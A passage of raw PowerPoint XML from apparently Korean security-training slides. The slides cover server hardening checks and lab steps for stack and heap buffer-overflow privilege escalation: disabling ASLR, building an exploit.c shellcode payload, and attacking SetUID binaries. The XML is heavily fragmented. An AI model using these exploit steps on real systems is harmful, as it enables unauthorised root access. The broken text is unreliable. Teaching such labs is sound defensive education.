      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29808422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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv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etc/hosts.equiv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rhost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 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33152047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user_list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33959796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–w packet.txt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-r packet.txt | more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dirty="0"/>
              <a:t>: qwer1031)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vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>user_list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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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user_list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user_list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(white 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 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6960275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/var/log/secure</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3857920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dirty="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(Pluggable Authentication Modules)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pam_wheel.so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pam_wheel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(wheel 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a:t>1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10127890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1999049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3020956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30488822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11750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871866597"/>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>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Race 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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Wireshark,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6105905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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="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-M intel -d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30474025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/sec/bof64.c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dirty="0"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">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/sec/bof64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0463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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d bof64 | more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1444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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian)</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dirty="0" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5897014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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0" dirty="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kernel.randomize_va_space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6.4)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1277213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/sec/bof64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SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/bof64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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># sysctl –w kernel.randomize_va_space=2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7871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위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test </a:t>
            </a:r>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/sec/bof64 $(python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dirty="0"/>
              <a:t>$ exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2)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22821578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만드는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exploit.c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-M intel -d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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15674141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/sec/stack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/sec/</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사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d stack | more</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8688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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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exploit.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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-o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>exploit.c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/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./exploit 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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>memset</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> (&amp; buffer,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dirty="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주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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(buffer + off)) = (long) (buffer +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824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3276629171"/>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>Login </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>과정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>들여다보기 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>(+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>데이터베이스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                        <a:t>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SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>이란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 보안 의 국가적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SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>취약점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dirty="0"/>
                        <a:t>Apache WS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>보안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Directory Listing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암호 실습</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>해쉬값</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 구하기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민감 데이터 노출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 인증과 세션 과정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하이재킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Session</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인증 및 세션관리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파일 다운로드</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업로드 취약점이란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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- Wireshark,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파일 다운로드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kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>네트워크 패킷 탐지 및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dirty="0" err="1"/>
                        <a:t>웹쉘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 을 이용한 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DDOS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과거 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이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– URL Redirect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로그 분석 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- DDOS 7.7 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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URL Redirect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t> 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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>XSS, CSRF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XSS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CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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29535444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/sec/stack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memcpy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (buffer + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (buffer) - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (shellcode), shellcode, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sizeof</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> (shellcode))</a:t>
                      </a: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상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25500369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kernel.randomize_va_space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execstack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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16421461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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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dirty="0"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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/sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /sec/stack*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–w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –c /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –q /sec/stack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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21905217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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10514605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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15978825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/sec/heap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ls –l heap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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>heap.c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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>goodfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
